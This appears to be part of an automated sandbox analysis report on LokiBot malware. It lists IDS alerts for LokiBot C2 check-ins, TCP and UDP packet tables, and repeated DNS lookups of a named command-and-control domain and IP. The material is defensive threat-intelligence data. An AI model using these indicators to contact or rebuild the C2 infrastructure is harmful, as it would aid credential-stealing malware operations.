                  01/14/22-17:29:36.420886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.5104.223.93.105
                  01/14/22-17:29:36.420886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.5104.223.93.105
                  01/14/22-17:29:36.420886TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.5104.223.93.105
                  01/14/22-17:29:37.798759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.5104.223.93.105
                  01/14/22-17:29:37.798759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.5104.223.93.105
                  01/14/22-17:29:37.798759TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.5104.223.93.105
                  01/14/22-17:29:39.184764TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.5104.223.93.105
                  01/14/22-17:29:39.184764TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.5104.223.93.105
                  01/14/22-17:29:39.184764TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.5104.223.93.105
                  01/14/22-17:29:40.528047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.5104.223.93.105
                  01/14/22-17:29:40.528047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.5104.223.93.105
                  01/14/22-17:29:40.528047TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.5104.223.93.105
                  01/14/22-17:29:41.926430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.5104.223.93.105
                  01/14/22-17:29:41.926430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.5104.223.93.105
                  01/14/22-17:29:41.926430TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.5104.223.93.105
                  01/14/22-17:29:43.436919TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.5104.223.93.105
                  01/14/22-17:29:43.436919TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.5104.223.93.105
                  01/14/22-17:29:43.436919TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.5104.223.93.105
                  01/14/22-17:29:44.869754TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.5104.223.93.105
                  01/14/22-17:29:44.869754TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.5104.223.93.105
                  01/14/22-17:29:44.869754TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.5104.223.93.105
                  01/14/22-17:29:46.912808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.5104.223.93.105
                  01/14/22-17:29:46.912808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.5104.223.93.105
                  01/14/22-17:29:46.912808TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.5104.223.93.105
                  01/14/22-17:29:51.162188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.5104.223.93.105
                  01/14/22-17:29:51.162188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.5104.223.93.105
                  01/14/22-17:29:51.162188TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.5104.223.93.105
                  01/14/22-17:29:53.715308TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.5104.223.93.105
                  01/14/22-17:29:53.715308TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.5104.223.93.105
                  01/14/22-17:29:53.715308TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.5104.223.93.105
                  01/14/22-17:29:55.732334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.5104.223.93.105
                  01/14/22-17:29:55.732334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.5104.223.93.105
                  01/14/22-17:29:55.732334TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.5104.223.93.105
                  01/14/22-17:29:57.571676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.5104.223.93.105
                  01/14/22-17:29:57.571676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.5104.223.93.105
                  01/14/22-17:29:57.571676TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.5104.223.93.105
                  01/14/22-17:30:00.627163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.5104.223.93.105
                  01/14/22-17:30:00.627163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.5104.223.93.105
                  01/14/22-17:30:00.627163TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.5104.223.93.105
                  01/14/22-17:30:02.041046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.5104.223.93.105
                  01/14/22-17:30:02.041046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.5104.223.93.105
                  01/14/22-17:30:02.041046TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.5104.223.93.105
                  01/14/22-17:30:03.405898TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.5104.223.93.105
                  01/14/22-17:30:03.405898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.5104.223.93.105
                  01/14/22-17:30:03.405898TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.5104.223.93.105
                  01/14/22-17:30:04.852682TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.5104.223.93.105
                  01/14/22-17:30:04.852682TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.5104.223.93.105
                  01/14/22-17:30:04.852682TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.5104.223.93.105
                  01/14/22-17:30:06.441232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.5104.223.93.105
                  01/14/22-17:30:06.441232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.5104.223.93.105
                  01/14/22-17:30:06.441232TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.5104.223.93.105
                  01/14/22-17:30:08.079184TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.5104.223.93.105
                  01/14/22-17:30:08.079184TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.5104.223.93.105
                  01/14/22-17:30:08.079184TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.5104.223.93.105
                  01/14/22-17:30:10.025451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.5104.223.93.105
                  01/14/22-17:30:10.025451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.5104.223.93.105
                  01/14/22-17:30:10.025451TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.5104.223.93.105

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 14, 2022 17:28:13.127573013 CET4975480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:13.312362909 CET8049754104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:13.312468052 CET4975480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:13.315745115 CET4975480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:13.446369886 CET8049754104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:13.446605921 CET4975480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:13.579961061 CET8049754104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:13.586972952 CET8049754104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:13.587043047 CET8049754104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:13.587162971 CET4975480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:13.587328911 CET4975480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:13.716434002 CET8049754104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:14.832711935 CET4975580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:14.963875055 CET8049755104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:14.964056015 CET4975580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:14.966907978 CET4975580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:15.097893000 CET8049755104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:15.098073006 CET4975580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:15.229207039 CET8049755104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:15.236922026 CET8049755104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:15.236974001 CET8049755104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:15.237075090 CET4975580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:15.237221956 CET4975580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:15.368714094 CET8049755104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:16.468199968 CET4975780192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:16.599865913 CET8049757104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:16.599967003 CET4975780192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:16.603027105 CET4975780192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:16.734165907 CET8049757104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:16.734231949 CET4975780192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:16.865334034 CET8049757104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:16.872795105 CET8049757104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:16.872894049 CET8049757104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:16.872925997 CET4975780192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:16.872937918 CET4975780192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:17.004089117 CET8049757104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:18.786120892 CET4976180192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:18.946105957 CET8049761104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:18.946300030 CET4976180192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:18.954071045 CET4976180192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:19.083564043 CET8049761104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:19.083688021 CET4976180192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:19.213036060 CET8049761104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:19.221434116 CET8049761104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:19.221496105 CET8049761104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:19.221610069 CET4976180192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:19.221667051 CET4976180192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:19.369648933 CET8049761104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:21.083108902 CET4976280192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:21.213958979 CET8049762104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:21.214113951 CET4976280192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:21.450628042 CET4976280192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:21.580496073 CET8049762104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:21.580569983 CET4976280192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:21.710346937 CET8049762104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:21.723001003 CET8049762104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:21.723030090 CET8049762104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:21.723149061 CET4976280192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:21.932380915 CET4976280192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:22.062105894 CET8049762104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:23.124599934 CET4976380192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:23.255527973 CET8049763104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:23.255724907 CET4976380192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:23.258656025 CET4976380192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:23.389377117 CET8049763104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:23.389926910 CET4976380192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:23.521075010 CET8049763104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:23.530498028 CET8049763104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:23.530517101 CET8049763104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:23.530709982 CET4976380192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:23.530833960 CET4976380192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:23.662244081 CET8049763104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:24.607203960 CET4976480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:24.747642994 CET8049764104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:24.747761011 CET4976480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:24.754729986 CET4976480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:24.882570982 CET8049764104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:24.882812977 CET4976480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:25.010787964 CET8049764104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:25.029998064 CET8049764104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:25.030052900 CET8049764104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:25.030206919 CET4976480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:25.031017065 CET4976480192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:25.172168970 CET8049764104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:25.957454920 CET4976580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:26.088448048 CET8049765104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:26.092111111 CET4976580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:26.095199108 CET4976580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:26.226052999 CET8049765104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:26.226634026 CET4976580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:26.357539892 CET8049765104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:26.366882086 CET8049765104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:26.366926908 CET8049765104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:26.367008924 CET4976580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:26.367063999 CET4976580192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:26.498384953 CET8049765104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:27.686556101 CET4976680192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:27.818377018 CET8049766104.223.93.105192.168.2.5
                  Jan 14, 2022 17:28:27.818569899 CET4976680192.168.2.5104.223.93.105
                  Jan 14, 2022 17:28:27.825342894 CET4976680192.168.2.5104.223.93.105

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 14, 2022 17:28:12.995415926 CET5479553192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:13.115070105 CET53547958.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:14.682817936 CET4955753192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:14.831212997 CET53495578.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:16.347955942 CET6173353192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:16.466959953 CET53617338.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:18.765908957 CET5244153192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:18.784615993 CET53524418.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:21.045820951 CET6217653192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:21.063589096 CET53621768.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:22.989414930 CET5959653192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:23.122594118 CET53595968.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:24.479134083 CET6529653192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:24.605462074 CET53652968.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:25.938558102 CET6318353192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:25.956110001 CET53631838.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:27.666655064 CET6015153192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:27.683886051 CET53601518.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:29.109404087 CET5696953192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:29.126961946 CET53569698.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:30.440949917 CET5516153192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:30.458503962 CET53551618.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:31.808276892 CET5475753192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:31.827296972 CET53547578.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:35.050508022 CET6007553192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:35.069721937 CET53600758.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:37.476960897 CET5501653192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:37.494354010 CET53550168.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:40.877268076 CET6434553192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:40.894728899 CET53643458.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:45.513106108 CET5712853192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:45.531521082 CET53571288.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:47.232352018 CET5479153192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:47.250000954 CET53547918.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:48.791320086 CET5046353192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:48.810790062 CET53504638.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:50.547035933 CET5039453192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:50.667985916 CET53503948.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:52.297509909 CET5381353192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:52.315208912 CET53538138.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:53.884567976 CET6373253192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:53.903908968 CET53637328.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:55.314445972 CET5734453192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:55.332171917 CET53573448.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:57.466471910 CET5445053192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:57.485555887 CET53544508.8.8.8192.168.2.5
                  Jan 14, 2022 17:28:58.860917091 CET5715153192.168.2.58.8.8.8
                  Jan 14, 2022 17:28:58.880289078 CET53571518.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:00.294476986 CET5941353192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:00.313199043 CET53594138.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:01.673733950 CET6051653192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:01.693216085 CET53605168.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:03.206645012 CET5164953192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:03.226144075 CET53516498.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:05.304295063 CET6508653192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:05.325781107 CET53650868.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:06.891650915 CET5643253192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:06.909065008 CET53564328.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:08.238142967 CET5292953192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:08.256097078 CET53529298.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:11.123244047 CET6100453192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:11.142402887 CET53610048.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:14.032655954 CET5689553192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:14.052234888 CET53568958.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:16.754798889 CET6237253192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:16.775743008 CET53623728.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:18.536864042 CET5667553192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:18.556022882 CET53566758.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:23.424036980 CET5717253192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:23.441941023 CET53571728.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:25.630590916 CET5526753192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:25.648001909 CET53552678.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:27.556257010 CET5096953192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:27.575892925 CET53509698.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:29.772454023 CET6436253192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:29.789906025 CET53643628.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:32.703675032 CET5476653192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:32.720993996 CET53547668.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:34.722784042 CET6144653192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:34.742059946 CET53614468.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:36.260248899 CET5751553192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:36.279872894 CET53575158.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:37.642805099 CET5819953192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:37.662089109 CET53581998.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:38.999887943 CET6522153192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:39.019954920 CET53652218.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:40.372648001 CET6157353192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:40.392208099 CET53615738.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:41.774826050 CET5656253192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:41.792356014 CET53565628.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:43.280211926 CET5359153192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:43.299621105 CET53535918.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:44.712246895 CET5968853192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:44.731709957 CET53596888.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:46.758122921 CET5603253192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:46.777492046 CET53560328.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:50.919126987 CET6345853192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:50.937889099 CET53634588.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:53.559356928 CET5042253192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:53.576899052 CET53504228.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:55.574177027 CET5324753192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:55.593589067 CET53532478.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:57.418695927 CET5381453192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:57.436048031 CET53538148.8.8.8192.168.2.5
                  Jan 14, 2022 17:29:59.970988035 CET5130553192.168.2.58.8.8.8
                  Jan 14, 2022 17:29:59.990144014 CET53513058.8.8.8192.168.2.5
                  Jan 14, 2022 17:30:01.880326033 CET5367053192.168.2.58.8.8.8
                  Jan 14, 2022 17:30:01.900036097 CET53536708.8.8.8192.168.2.5
                  Jan 14, 2022 17:30:03.246323109 CET5516053192.168.2.58.8.8.8
                  Jan 14, 2022 17:30:03.264153004 CET53551608.8.8.8192.168.2.5
                  Jan 14, 2022 17:30:04.588593960 CET6141453192.168.2.58.8.8.8
                  Jan 14, 2022 17:30:04.710212946 CET53614148.8.8.8192.168.2.5
                  Jan 14, 2022 17:30:06.287013054 CET6384753192.168.2.58.8.8.8
                  Jan 14, 2022 17:30:06.306135893 CET53638478.8.8.8192.168.2.5
                  Jan 14, 2022 17:30:07.919339895 CET6152353192.168.2.58.8.8.8
                  Jan 14, 2022 17:30:07.938632011 CET53615238.8.8.8192.168.2.5
                  Jan 14, 2022 17:30:09.826633930 CET5055153192.168.2.58.8.8.8
                  Jan 14, 2022 17:30:09.846517086 CET53505518.8.8.8192.168.2.5

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 14, 2022 17:28:12.995415926 CET192.168.2.58.8.8.80xcc77Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:14.682817936 CET192.168.2.58.8.8.80x2fa2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:16.347955942 CET192.168.2.58.8.8.80xefadStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:18.765908957 CET192.168.2.58.8.8.80x3ce6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:21.045820951 CET192.168.2.58.8.8.80x8000Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:22.989414930 CET192.168.2.58.8.8.80x4772Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:24.479134083 CET192.168.2.58.8.8.80x76d2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:25.938558102 CET192.168.2.58.8.8.80x1ce3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:27.666655064 CET192.168.2.58.8.8.80x2531Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:29.109404087 CET192.168.2.58.8.8.80xdc7fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:30.440949917 CET192.168.2.58.8.8.80x29b6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:31.808276892 CET192.168.2.58.8.8.80xd171Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:35.050508022 CET192.168.2.58.8.8.80xbf81Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:37.476960897 CET192.168.2.58.8.8.80xd37bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:40.877268076 CET192.168.2.58.8.8.80xef55Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:45.513106108 CET192.168.2.58.8.8.80x734cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:47.232352018 CET192.168.2.58.8.8.80x84bcStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:48.791320086 CET192.168.2.58.8.8.80x2c2bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:50.547035933 CET192.168.2.58.8.8.80x1ed1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:52.297509909 CET192.168.2.58.8.8.80xbf51Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:53.884567976 CET192.168.2.58.8.8.80xf1f7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:55.314445972 CET192.168.2.58.8.8.80x3666Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:57.466471910 CET192.168.2.58.8.8.80x34aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:58.860917091 CET192.168.2.58.8.8.80x1206Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:00.294476986 CET192.168.2.58.8.8.80xbb58Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:01.673733950 CET192.168.2.58.8.8.80x7fbaStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:03.206645012 CET192.168.2.58.8.8.80x34baStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:05.304295063 CET192.168.2.58.8.8.80xd94fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:06.891650915 CET192.168.2.58.8.8.80x5a1bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:08.238142967 CET192.168.2.58.8.8.80x2f60Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:11.123244047 CET192.168.2.58.8.8.80x8dfbStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:14.032655954 CET192.168.2.58.8.8.80xd123Standard query (0)slimpackage.comA (IP address)IN (0x0001)
